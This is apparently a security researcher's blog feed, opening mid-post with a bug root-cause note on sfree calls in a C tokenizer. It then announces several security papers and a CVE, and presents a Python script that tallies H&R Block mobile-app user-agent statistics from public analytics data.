<h2>Root Cause</h2>
<p>According to ARCUS, the root cause appears to be frees that occur within
<code>get_token</code> in <code>input.c</code>. Specifically, it labels Line 416:</p>
<div class="highlight"><pre><span></span><code><span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">rsc</span><span class="p">.</span><span class="n">text</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">in</span><span class="o">-></span><span class="n">pushback_chars</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">dupstr</span><span class="p">(</span><span class="n">rsc</span><span class="p">.</span><span class="n">text</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">prevpos</span><span class="p">);</span>
<span class="w"> </span><span class="n">sfree</span><span class="p">(</span><span class="n">rsc</span><span class="p">.</span><span class="n">text</span><span class="p">);</span>
<span class="w"> </span><span class="p">}</span>
</code></pre></div>
<p>And Line 469:</p>
<div class="highlight"><pre><span></span><code><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">c</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="sc">'{'</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="cm">/* tok_lbrace */</span>
<span class="w"> </span><span class="n">ret</span><span class="p">.</span><span class="n">type</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">tok_lbrace</span><span class="p">;</span>
<span class="w"> </span><span class="n">sfree</span><span class="p">(</span><span class="n">rsc</span><span class="p">.</span><span class="n">text</span><span class="p">);</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">ret</span><span class="p">;</span>
</code></pre></div>
<p>There are several other lines in <code>get_token</code> that also call <code>sfree</code> and might be
problematic.</p>Bunkerbuster to Appear in CCS'212021-09-06T13:00:00-04:002021-09-06T13:00:00-04:00Carter Yagemanntag:carteryagemann.com,2021-09-06:/ccs-21-bunkerbuster.html<p>My coauthors and I will be presenting the paper, <em>Automated Bug
Hunting With Data-Driven Symbolic Root Cause Analysis</em>, at
<a href="https://sigsac.org/ccs/CCS2021/index.html">CCS 2021</a>.
Below is a preview of the abstract:</p>
<blockquote>
<p>The increasing cost of successful cyberattacks has caused a mindset
shift, whereby defenders now employ proactive defenses, namely
software bug hunting, alongside …</p></blockquote><p>My coauthors and I will be presenting the paper, <em>Automated Bug
Hunting With Data-Driven Symbolic Root Cause Analysis</em>, at
<a href="https://sigsac.org/ccs/CCS2021/index.html">CCS 2021</a>.
Below is a preview of the abstract:</p>
<blockquote>
<p>The increasing cost of successful cyberattacks has caused a mindset
shift, whereby defenders now employ proactive defenses, namely
software bug hunting, alongside existing reactive measures (firewalls,
IDS, IPS) to protect systems. Unfortunately the path from
hunting bugs to deploying patches remains laborious and expensive,
requires human expertise, and still misses serious memory
corruptions. Motivated by these challenges, we propose bug hunting
using symbolically reconstructed states based on execution
traces to achieve better detection and root cause analysis of overflow,
use-after-free, double free, and format string bugs across user
programs and their imported libraries. We discover that with the
right use of widely available hardware processor tracing and partial
memory snapshots, powerful symbolic analysis can be used on
real-world programs while managing path explosion. Better yet,
data can be captured from production deployments of live software
on end-host systems transparently, aiding in the analysis of user
clients and long-running programs like web servers.</p>
<p>We implement a prototype of our design, Bunkerbuster, for Linux
and evaluate it on 15 programs, where it finds 39 instances of our
target bug classes, 8 of which have never before been reported and
have lead to 1 EDB and 3 CVE IDs being issued. These 0-days were
patched by developers using Bunkerbuster’s reports, independently
validating their usefulness. In a side-by-side comparison, our system
uncovers 8 bugs missed by AFL and QSYM, and correctly classifies
4 that were previously detected, but mislabeled by AddressSanitizer.
Our prototype accomplishes this with 7.21% recording overhead.</p>
</blockquote>
<p>The code and data for this project will be made available on my
public Github <a href="https://github.com/carter-yagemann/arcus">account</a>.</p>MARSARA to Appear in CCS'212021-08-31T17:00:00-04:002021-08-31T17:00:00-04:00Carter Yagemanntag:carteryagemann.com,2021-08-31:/ccs-21-marsara.html<p>My coauthors and I will be presenting a paper on "Validating the Integrity of
Audit Logs Against Execution Repartitioning Attacks" at
<a href="https://sigsac.org/ccs/CCS2021/index.html">CCS 2021</a>.
Below is a preview of the abstract:</p>
<blockquote>
<p>Provenance-based causal analysis of audit logs has proven to be
an invaluable method of investigating system intrusions. However,
it also …</p></blockquote><p>My coauthors and I will be presenting a paper on "Validating the Integrity of
Audit Logs Against Execution Repartitioning Attacks" at
<a href="https://sigsac.org/ccs/CCS2021/index.html">CCS 2021</a>.
Below is a preview of the abstract:</p>
<blockquote>
<p>Provenance-based causal analysis of audit logs has proven to be
an invaluable method of investigating system intrusions. However,
it also suffers from dependency explosion, whereby long-running
processes accumulate many dependencies that are hard to unravel.
Execution unit partitioning addresses this by segmenting dependencies
into units of work, such as isolating the events that processed
a single HTTP request. Unfortunately, we discover that current
designs have a semantic gap problem due to how system calls and
application log messages are used to infer complex internal program
states. We demonstrate how attackers can modify existing
code exploits to control event partitioning, breaking links in the
attack and framing innocent users. We also show how our techniques
circumvent existing program and log integrity defenses.</p>
<p>We then propose a new design for execution unit partitioning
that leverages additional runtime data to yield verified partitions
that resist manipulation. Our design overcomes the technical challenges
of minimizing additional overhead while accurately connecting low level
code instructions to high level audit events, in
part with the use of commodity hardware processor tracing. We
implement a prototype of our design for Linux, MARSARA, and
extensively evaluate it on 14 real-world programs, targeted with
expertly crafted exploits. MARSARA’s verified partitions successfully
capture all the attack provenances while only reintroducing 2.82%
of false dependencies, in the worst case, with an average overhead
of 8.7%. Using a new metric called Partitioning Attack Surface, we
show that MARSARA eliminates 47,642 more repartitioning gadgets
per program than integrity defenses like CFI, demonstrating our
prototype’s effectiveness and the novelty of the attacks it prevents</p>
</blockquote>"Modeling Large-Scale Manipulation in Open Stock Markets" to Appear in IEEE Security & Privacy2021-05-26T14:00:00-04:002021-05-26T14:00:00-04:00Carter Yagemanntag:carteryagemann.com,2021-05-26:/sp21-market-manipulation.html<p>An article my coauthors and I wrote on automated large-scale market manipulation will be
appearing in the November issue of IEEE Security & Privacy. It is currently available early
access <a href="https://doi.org/10.1109/MSEC.2021.3076717">here</a>. Below is the abstract:</p>
<blockquote>
<p>This article studies the feasibility of using a botnet to automate stock market manipulation,
incorporating data …</p></blockquote><p>An article my coauthors and I wrote on automated large-scale market manipulation will be
appearing in the November issue of IEEE Security & Privacy. It is currently available early
access <a href="https://doi.org/10.1109/MSEC.2021.3076717">here</a>. Below is the abstract:</p>
<blockquote>
<p>This article studies the feasibility of using a botnet to automate stock market manipulation,
incorporating data from U.S. Securities and Exchange Commission case files, security surveys
of online retail brokerage accounts, and dark web marketplace listings.</p>
</blockquote>ARCUS System and Dataset Released2021-02-08T11:00:00-05:002021-02-08T11:00:00-05:00Carter Yagemanntag:carteryagemann.com,2021-02-08:/arcus-open-source.html<p>We have released the <a href="https://github.com/carter-yagemann/arcus">source code</a> and
evaluation <a href="https://super.gtisc.gatech.edu/arcus-dataset-public.tgz">dataset</a> for
"ARCUS: Symbolic Root Cause Analysis of Exploits in Production Systems," which will
be appearing at <a href="https://www.usenix.org/conference/usenixsecurity21">USENIX Security 2021</a>
in August, 2021.</p>
<p>The paper will be ready for publication in about a month.</p>Vulnerability Root Cause Analysis Approach "ARCUS" to Appear in USENIX'212020-12-12T10:00:00-05:002020-12-12T10:00:00-05:00Carter Yagemanntag:carteryagemann.com,2020-12-12:/usenix-21-arcus.html<p>My coauthors and I will be presenting a paper "ARCUS: Symbolic Root Cause Analysis of
Exploits in Production Systems" at
<a href="https://www.usenix.org/conference/usenixsecurity21">USENIX Security 2021</a> in August,
2021. Below is a preview of the abstract:</p>
<blockquote>
<p>End-host runtime monitors (e.g., CFI, system call IDS) flag
processes in response to symptoms of a …</p></blockquote><p>My coauthors and I will be presenting a paper "ARCUS: Symbolic Root Cause Analysis of
Exploits in Production Systems" at
<a href="https://www.usenix.org/conference/usenixsecurity21">USENIX Security 2021</a> in August,
2021. Below is a preview of the abstract:</p>
<blockquote>
<p>End-host runtime monitors (e.g., CFI, system call IDS) flag
processes in response to symptoms of a possible attack. Unfortunately,
the symptom (e.g., invalid control transfer) may
occur long after the root cause (e.g., buffer overflow), creating
a gap whereby bug reports received by developers contain
(at best) a snapshot of the process long after it executed the
buggy instructions. To help system administrators provide developers with
more concise reports, we propose ARCUS, an
automated framework that performs root cause analysis over
the execution flagged by the end-host monitor. ARCUS works
by testing "what if" questions to detect vulnerable states, systematically
localizing bugs to their concise root cause while
finding additional enforceable checks at the program binary
level to demonstrably block them. Using hardware-supported
processor tracing, ARCUS decouples the cost of analysis
from host performance.</p>
<p>We have implemented ARCUS and evaluated it on 31 vulnerabilities across
20 programs along with over 9,000 test
cases from the RIPE and Juliet suites. ARCUS identifies the
root cause of all tested exploits — with 0 false positives or
negatives — and even finds 4 new 0-day vulnerabilities in
traces averaging 4,000,000 basic blocks. ARCUS handles
programs compiled from upwards of 810,000 lines of C/C++
code without needing concrete inputs or re-execution.</p>
</blockquote>
<p>In the coming months, we will also publish the source code for ARCUS and some sample
data for the community to use. ARCUS has already led to the discovery of 4 novel
vulnerabilities, one of which is currently public:
<a href="https://www.exploit-db.com/exploits/47254">EDB-47254</a>. The others will be released
in the coming months.</p>"Justitia" Biometric Privacy to Appear in ASIACCS'212020-10-26T10:00:00-04:002020-10-26T10:00:00-04:00Carter Yagemanntag:carteryagemann.com,2020-10-26:/asiaccs-21-justitia.html<p>My coauthors and I will be presenting the paper "Cryptographic Key Derivation from
Biometric Inferences for Remote Authentication" at
<a href="https://asiaccs2021.comp.polyu.edu.hk/">Asia CCS 2021</a> in June of next year. Below
is a preview of the abstract:</p>
<blockquote>
<p>Biometric authentication is getting increasingly popular because of its appealing
usability and improvements in biometric sensors …</p></blockquote><p>My coauthors and I will be presenting the paper "Cryptographic Key Derivation from
Biometric Inferences for Remote Authentication" at
<a href="https://asiaccs2021.comp.polyu.edu.hk/">Asia CCS 2021</a> in June of next year. Below
is a preview of the abstract:</p>
<blockquote>
<p>Biometric authentication is getting increasingly popular because of its appealing
usability and improvements in biometric sensors. At the same time, it raises
serious privacy concerns since the common deployment involves storing
bio-templates in remote servers. Current solutions propose to keep these templates
on the client's device, outside the server's reach. This binds the client to the
initial device. A more attractive solution is to have the server authenticate the
client, thereby decoupling them from the device.</p>
<p>Unfortunately, existing biometric
template protection schemes either suffer from the practicality or accuracy. The
state-of-the-art deep learning (DL) solutions solve the accuracy problem in
face- and voice-based verification. However, existing privacy-preserving methods do
not accommodate the DL methods, as they are tailored to the hand-crafted feature space
of specific modalities in general.</p>
<p>In this work, we propose a novel pipeline, Justitia, that makes DL-inferences of
face and voice biometrics compatible with the standard privacy-preserving primitives,
like fuzzy extractors (FE). For this, we first form a bridge between Euclidean (or
cosine) space of DL and Hamming space of FE, while maintaining the accuracy and
privacy of underlying schemes. We also introduce efficient noise handling methods to
keep the FE scheme practically applicable.</p>
<p>We implement an end-to-end prototype to evaluate our design, then show how to improve
the security for sensitive authentications and usability for non-sensitive, day-to-day,
authentications. Justitia achieves the same, 0.33% false rejection at zero false
acceptance, errors as the plaintext baseline does on the YouTube Faces benchmark.
Moreover, combining face and voice achieves 1.32% false rejection at zero false acceptance.
According to our systematical security assessments conducted through prior approaches
and our novel black-box method, Justitia, achieves ~25 bits and ~33 bits of security
guarantees for face- and face&voice-based pipelines, respectively.</p>
</blockquote>"Bot2Stock" to Appear in ACSAC'202020-10-04T10:00:00-04:002020-10-04T10:00:00-04:00Carter Yagemanntag:carteryagemann.com,2020-10-04:/acsac-20-bot2stock.html<p>My coauthors and I will be presenting a paper "On the Feasibility of Automating Stock Market
Manipulation" at <a href="https://www.acsac.org/2020/program/papers/">ACSAC 2020</a> in December.
Below is a preview of the abstract:</p>
<blockquote>
<p>This work presents the first findings on the feasibility of using
botnets to automate stock market manipulation. Our analysis incorporates
data …</p></blockquote><p>My coauthors and I will be presenting a paper "On the Feasibility of Automating Stock Market
Manipulation" at <a href="https://www.acsac.org/2020/program/papers/">ACSAC 2020</a> in December.
Below is a preview of the abstract:</p>
<blockquote>
<p>This work presents the first findings on the feasibility of using
botnets to automate stock market manipulation. Our analysis incorporates
data gathered from SEC case files, security surveys of online
brokerages, and dark web marketplace data. We address several
technical challenges, including how to adapt existing techniques
for automation, the cost of hijacking brokerage accounts, avoiding
detection, and more. We consolidate our findings into a working
proof-of-concept, man-in-the-browser malware, Bot2Stock, capable
of controlling victim email and brokerage accounts to commit fraud.
We evaluate our bots and protocol using agent-based market simulations,
where we find that a 1.5% ratio of bots to benign traders
yields a 2.8% return on investment (ROI) per attack. Given the short
duration of each attack (< 1 minute), achieving this ratio is trivial,
requiring only 4 bots to target stocks like IBM. 1,000 bots, cumulatively
gathered over 1 year, can turn $100,000 into $1,022,000,
placing Bot2Stock on par with existing botnet scams.</p>
</blockquote>
<p>The evaluation artifact is also <a href="https://www.acsac.org/2020/program/artifacts/">available</a>,
however be warned that we used a 32-core server to generate the results so
casual users may find the experiments difficult to reproduce.</p>New CVE Published (CVE-2020-14931)2020-06-29T18:00:00-04:002020-06-29T18:00:00-04:00Carter Yagemanntag:carteryagemann.com,2020-06-29:/cve-2020-14931.html<p>CVE-2020-14931 has been assigned for a vulnerability I found in DMitry.
The details are available <a href="https://nvd.nist.gov/vuln/detail/CVE-2020-14931">here</a>.</p>
<p>This issue is currently being <a href="https://github.com/jaygreig86/dmitry/issues/4">patched</a>.</p>H&R Block App Analytics for 20202020-06-18T17:30:00-04:002020-06-18T17:30:00-04:00Carter Yagemanntag:carteryagemann.com,2020-06-18:/hrb-analytics-2020.html<p>Two years ago I started a <a href="https://carteryagemann.com/hrb-analytics.html">series</a> about
using the analytics publicly released by the USA government to gleam some information
about H&R Block's mobile apps. I'm a few months late this year, but it's time to
update the numbers for the 2020 tax year. The 2019 numbers are …</p><p>Two years ago I started a <a href="https://carteryagemann.com/hrb-analytics.html">series</a> about
using the analytics publicly released by the USA government to gleam some information
about H&R Block's mobile apps. I'm a few months late this year, but it's time to
update the numbers for the 2020 tax year. The 2019 numbers are available
<a href="https://carteryagemann.com/hrb-analytics-2019.html">here</a>.</p>
<p>This time I went ahead and updated the code to make parsing a little more flexible:</p>
<div class="highlight"><pre><span></span><code><span class="p">:::</span><span class="n">python</span>
<span class="c1">#!/usr/bin/env python</span>
<span class="kn">from</span> <span class="nn">__future__</span> <span class="kn">import</span> <span class="n">print_function</span>
<span class="kn">import</span> <span class="nn">sys</span>
<span class="kn">import</span> <span class="nn">json</span>
<span class="kn">import</span> <span class="nn">re</span>
<span class="k">def</span> <span class="nf">parse_subtokens</span><span class="p">(</span><span class="n">tokens</span><span class="p">):</span>
<span class="w"> </span><span class="sd">""" Parses subtokens and returns a dictionary. If invalid, None is returned.</span>
<span class="sd"> We expect all user agents to start with "HBR MOBILE", after which we can encounter</span>
<span class="sd"> OS, device, app, authentication, browser, and app version strings. Everything except</span>
<span class="sd"> version is matched using exact string comparisons. Version uses a regex.</span>
<span class="sd"> """</span>
<span class="n">res</span> <span class="o">=</span> <span class="p">{</span><span class="s1">'OS'</span><span class="p">:</span> <span class="s1">'N/A'</span><span class="p">,</span> <span class="s1">'DEVICE'</span><span class="p">:</span> <span class="s1">'N/A'</span><span class="p">,</span> <span class="s1">'APP'</span><span class="p">:</span> <span class="s1">'N/A'</span><span class="p">,</span> <span class="s1">'AUTH'</span><span class="p">:</span> <span class="s1">'N/A'</span><span class="p">,</span> <span class="s1">'VERSION'</span><span class="p">:</span> <span class="s1">'N/A'</span><span class="p">,</span> <span class="s1">'BROWSER'</span><span class="p">:</span> <span class="s1">'N/A'</span><span class="p">}</span>
<span class="n">token_mapping</span> <span class="o">=</span> <span class="p">{</span><span class="s1">'ANDROID'</span><span class="p">:</span> <span class="s1">'OS'</span><span class="p">,</span> <span class="s1">'IOS'</span><span class="p">:</span> <span class="s1">'OS'</span><span class="p">,</span>
<span class="s1">'PHONE'</span><span class="p">:</span> <span class="s1">'DEVICE'</span><span class="p">,</span> <span class="s1">'TABLET'</span><span class="p">:</span> <span class="s1">'DEVICE'</span><span class="p">,</span>
<span class="s1">'MYBLOCK'</span><span class="p">:</span> <span class="s1">'APP'</span><span class="p">,</span> <span class="s1">'TAXES'</span><span class="p">:</span> <span class="s1">'APP'</span><span class="p">,</span>
<span class="s1">'TOUCHID'</span><span class="p">:</span> <span class="s1">'AUTH'</span><span class="p">,</span> <span class="s1">'FACEID'</span><span class="p">:</span> <span class="s1">'AUTH'</span><span class="p">,</span>
<span class="s1">'Mozilla'</span><span class="p">:</span> <span class="s1">'BROWSER'</span><span class="p">}</span>
<span class="k">if</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">!=</span> <span class="s1">'HRB'</span><span class="p">:</span>
<span class="k">return</span> <span class="kc">None</span>
<span class="k">if</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">!=</span> <span class="s1">'MOBILE'</span><span class="p">:</span>
<span class="k">return</span> <span class="kc">None</span>
<span class="k">for</span> <span class="n">token</span> <span class="ow">in</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">2</span><span class="p">:]:</span>
<span class="k">if</span> <span class="n">token</span> <span class="ow">in</span> <span class="n">token_mapping</span><span class="p">:</span>
<span class="n">res</span><span class="p">[</span><span class="n">token_mapping</span><span class="p">[</span><span class="n">token</span><span class="p">]]</span> <span class="o">=</span> <span class="n">token</span>
<span class="k">elif</span> <span class="n">re</span><span class="o">.</span><span class="n">match</span><span class="p">(</span><span class="s1">'v?[0-9]+\.[0-9]+\.[0-9]+'</span><span class="p">,</span> <span class="n">token</span><span class="p">):</span>
<span class="n">res</span><span class="p">[</span><span class="s1">'VERSION'</span><span class="p">]</span> <span class="o">=</span> <span class="n">token</span>
<span class="k">else</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'WARNING: Unknown token: </span><span class="si">%s</span><span class="s1"> from </span><span class="si">%s</span><span class="s1">'</span> <span class="o">%</span> <span class="p">(</span><span class="n">token</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">tokens</span><span class="p">)),</span> <span class="n">file</span><span class="o">=</span><span class="n">sys</span><span class="o">.</span><span class="n">stderr</span><span class="p">)</span>
<span class="c1"># Cleanups:</span>
<span class="c1"># 1) Some versions of the Android app prefix 'v' onto version</span>
<span class="k">if</span> <span class="n">res</span><span class="p">[</span><span class="s1">'VERSION'</span><span class="p">][</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="s1">'v'</span><span class="p">:</span>
<span class="n">res</span><span class="p">[</span><span class="s1">'VERSION'</span><span class="p">]</span> <span class="o">=</span> <span class="n">res</span><span class="p">[</span><span class="s1">'VERSION'</span><span class="p">][</span><span class="mi">1</span><span class="p">:]</span>
<span class="k">assert</span> <span class="nb">len</span><span class="p">(</span><span class="n">res</span><span class="p">)</span> <span class="o">==</span> <span class="mi">6</span>
<span class="k">return</span> <span class="n">res</span>
<span class="k">def</span> <span class="nf">is_hrb</span><span class="p">(</span><span class="n">year</span><span class="p">,</span> <span class="nb">filter</span><span class="p">,</span> <span class="n">line</span><span class="p">):</span>
<span class="w"> </span><span class="sd">""" Validate that a line should be parsed and added to the buckets.</span>
<span class="sd"> Specifically, entry should contain the right year, be a HRB user-agent,</span>
<span class="sd"> and contain the filter keyword if one was provided.</span>
<span class="sd"> """</span>
<span class="k">if</span> <span class="n">line</span><span class="p">[:</span><span class="mi">4</span><span class="p">]</span> <span class="o">!=</span> <span class="n">year</span><span class="p">:</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="k">if</span> <span class="n">line</span><span class="p">[</span><span class="mi">11</span><span class="p">:</span><span class="mi">14</span><span class="p">]</span> <span class="o">!=</span> <span class="s1">'HRB'</span><span class="p">:</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="k">if</span> <span class="ow">not</span> <span class="nb">filter</span> <span class="ow">is</span> <span class="kc">None</span> <span class="ow">and</span> <span class="ow">not</span> <span class="nb">filter</span> <span class="ow">in</span> <span class="n">line</span><span class="p">:</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="k">return</span> <span class="kc">True</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">)</span> <span class="o"><</span> <span class="mi">3</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'Usage: </span><span class="si">%s</span><span class="s1"> <tax-year> [filter] <filepath>'</span> <span class="o">%</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span>
<span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">)</span> <span class="o">==</span> <span class="mi">3</span><span class="p">:</span>
<span class="nb">filter</span> <span class="o">=</span> <span class="kc">None</span>
<span class="k">else</span><span class="p">:</span>
<span class="nb">filter</span> <span class="o">=</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">],</span> <span class="s1">'r'</span><span class="p">)</span> <span class="k">as</span> <span class="n">ifile</span><span class="p">:</span>
<span class="n">data</span> <span class="o">=</span> <span class="p">[</span><span class="n">line</span><span class="o">.</span><span class="n">strip</span><span class="p">()</span> <span class="k">for</span> <span class="n">line</span> <span class="ow">in</span> <span class="n">ifile</span> <span class="k">if</span> <span class="n">is_hrb</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="nb">filter</span><span class="p">,</span> <span class="n">line</span><span class="p">)]</span>
<span class="n">buckets</span> <span class="o">=</span> <span class="p">{</span>
<span class="s1">'OS'</span><span class="p">:</span> <span class="p">{</span>
<span class="s1">'IOS'</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="s1">'ANDROID'</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="p">},</span>
<span class="s1">'DEVICE'</span><span class="p">:</span> <span class="p">{</span>
<span class="s1">'PHONE'</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="s1">'TABLET'</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="p">},</span>
<span class="s1">'APP'</span><span class="p">:</span> <span class="p">{</span>
<span class="s1">'MYBLOCK'</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="s1">'TAXES'</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="p">},</span>
<span class="s1">'AUTH'</span><span class="p">:</span> <span class="p">{</span>
<span class="s1">'TOUCHID'</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="s1">'FACEID'</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="s1">'N/A'</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="p">},</span>
<span class="s1">'VERSION'</span><span class="p">:</span> <span class="p">{},</span>
<span class="s1">'BROWSER'</span><span class="p">:</span> <span class="p">{},</span>
<span class="p">}</span>
<span class="k">for</span> <span class="n">line</span> <span class="ow">in</span> <span class="n">data</span><span class="p">:</span>
<span class="n">tokens</span> <span class="o">=</span> <span class="n">line</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s1">','</span><span class="p">)</span>
<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">tokens</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">3</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'WARNING: Cannot tokenize: </span><span class="si">%s</span><span class="s1">'</span> <span class="o">%</span> <span class="n">line</span><span class="p">,</span> <span class="n">file</span><span class="o">=</span><span class="n">sys</span><span class="o">.</span><span class="n">stderr</span><span class="p">)</span>
<span class="k">continue</span>
<span class="n">subtokens</span> <span class="o">=</span> <span class="n">parse_subtokens</span><span class="p">(</span><span class="n">tokens</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s1">'-'</span><span class="p">))</span>
<span class="k">if</span> <span class="n">subtokens</span> <span class="ow">is</span> <span class="kc">None</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'WARNING: Cannot subtokenize: </span><span class="si">%s</span><span class="s1">'</span> <span class="o">%</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s1">'-'</span><span class="p">),</span> <span class="n">file</span><span class="o">=</span><span class="n">sys</span><span class="o">.</span><span class="n">stderr</span><span class="p">)</span>
<span class="k">continue</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">count</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">tokens</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">])</span>
<span class="k">except</span> <span class="ne">ValueError</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'WARNING: Could not parse count from: </span><span class="si">%s</span><span class="s1">'</span> <span class="o">%</span> <span class="n">line</span><span class="p">,</span> <span class="n">file</span><span class="o">=</span><span class="n">sys</span><span class="o">.</span><span class="n">stderr</span><span class="p">)</span>
<span class="k">continue</span>
<span class="n">buckets</span><span class="p">[</span><span class="s1">'OS'</span><span class="p">][</span><span class="n">subtokens</span><span class="p">[</span><span class="s1">'OS'</span><span class="p">]]</span> <span class="o">+=</span> <span class="n">count</span>
<span class="n">buckets</span><span class="p">[</span><span class="s1">'DEVICE'</span><span class="p">][</span><span class="n">subtokens</span><span class="p">[</span><span class="s1">'DEVICE'</span><span class="p">]]</span> <span class="o">+=</span> <span class="n">count</span>
<span class="n">buckets</span><span class="p">[</span><span class="s1">'APP'</span><span class="p">][</span><span class="n">subtokens</span><span class="p">[</span><span class="s1">'APP'</span><span class="p">]]</span> <span class="o">+=</span> <span class="n">count</span>
<span class="n">buckets</span><span class="p">[</span><span class="s1">'AUTH'</span><span class="p">][</span><span class="n">subtokens</span><span class="p">[</span><span class="s1">'AUTH'</span><span class="p">]]</span> <span class="o">+=</span> <span class="n">count</span>
<span class="k">if</span> <span class="n">subtokens</span><span class="p">[</span><span class="s1">'VERSION'</span><span class="p">]</span> <span class="ow">in</span> <span class="n">buckets</span><span class="p">[</span><span class="s1">'VERSION'</span><span class="p">]:</span>
<span class="n">buckets</span><span class="p">[</span><span class="s1">'VERSION'</span><span class="p">][</span><span class="n">subtokens</span><span class="p">[</span><span class="s1">'VERSION'</span><span class="p">]]</span> <span class="o">+=</span> <span class="n">count</span>
<span class="k">else</span><span class="p">:</span>
<span class="n">buckets</span><span class="p">[</span><span class="s1">'VERSION'</span><span class="p">][</span><span class="n">subtokens</span><span class="p">[</span><span class="s1">'VERSION'</span><span class="p">]]</span> <span class="o">=</span> <span class="n">count</span>
<span class="k">if</span> <span class="n">subtokens</span><span class="p">[</span><span class="s1">'BROWSER'</span><span class="p">]</span> <span class="ow">in</span> <span class="n">buckets</span><span class="p">[</span><span class="s1">'BROWSER'</span><span class="p">]:</span>
<span class="n">buckets</span><span class="p">[</span><span class="s1">'BROWSER'</span><span class="p">][</span><span class="n">subtokens</span><span class="p">[</span><span class="s1">'BROWSER'</span><span class="p">]]</span> <span class="o">+=</span> <span class="n">count</span>
<span class="k">else</span><span class="p">:</span>
<span class="n">buckets</span><span class="p">[</span><span class="s1">'BROWSER'</span><span class="p">][</span><span class="n">subtokens</span><span class="p">[</span><span class="s1">'BROWSER'</span><span class="p">]]</span> <span class="o">=</span> <span class="n">count</span>
<span class="nb">print</span><span class="p">(</span><span class="n">json</span><span class="o">.</span><span class="n">dumps</span><span class="p">(</span><span class="n">buckets</span><span class="p">,</span> <span class="n">indent</span><span class="o">=</span><span class="mi">4</span><span class="p">))</span>
</code></pre></div>
<p>I've been collecting this data since 2016 and I'm happy to share upon request.</p>
<h2>Results</h2>
<p>Here are the results for 2020, in no particular order:</p>
<ul>
<li>From January 13 through April 14, <strong>0</strong> requests were made by MyBlock and <strong>563,138</strong> by Taxes.</li>
<li><strong>545,368</strong> requests were made from phones while <strong>17,770</strong> were tablets; about
<strong>97%</strong> of the requests were phones.</li>
<li><strong>100%</strong> of requests were made by devices running iOS.</li>
<li>Seven versions of Taxes appear in the dataset: <strong>9.2.0</strong>, <strong>9.2.1</strong>, <strong>9.3.0</strong>, <strong>9.3.1</strong>, <strong>9.4.0</strong>, <strong>9.5.0</strong>, and <strong>9.6.0</strong>.</li>
<li><strong>0.2%</strong> of requests contain "Mozilla" in the user-agent.</li>
</ul>
<p>And the security question from the original blog post:</p>
<ul>
<li><strong>221,827</strong> requests used TouchID, <strong>265,313</strong> FaceID,
and <strong>75,998</strong> showed neither keyword;
<strong>39%</strong>, <strong>47%</strong>, and <strong>14%</strong>, respectively.</li>
</ul>
<h2>Comparison to 2019</h2>
<ul>
<li>In 2019, the majority of requests were made by Taxes. Now in 2020, only Taxes appears in the data.</li>
<li>The change in usage of TouchID, FaceID, and neither is <strong>-20%</strong>, <strong>21%</strong>, and <strong>-1%</strong>, respectively.</li>
</ul>
<h2>Discussion</h2>
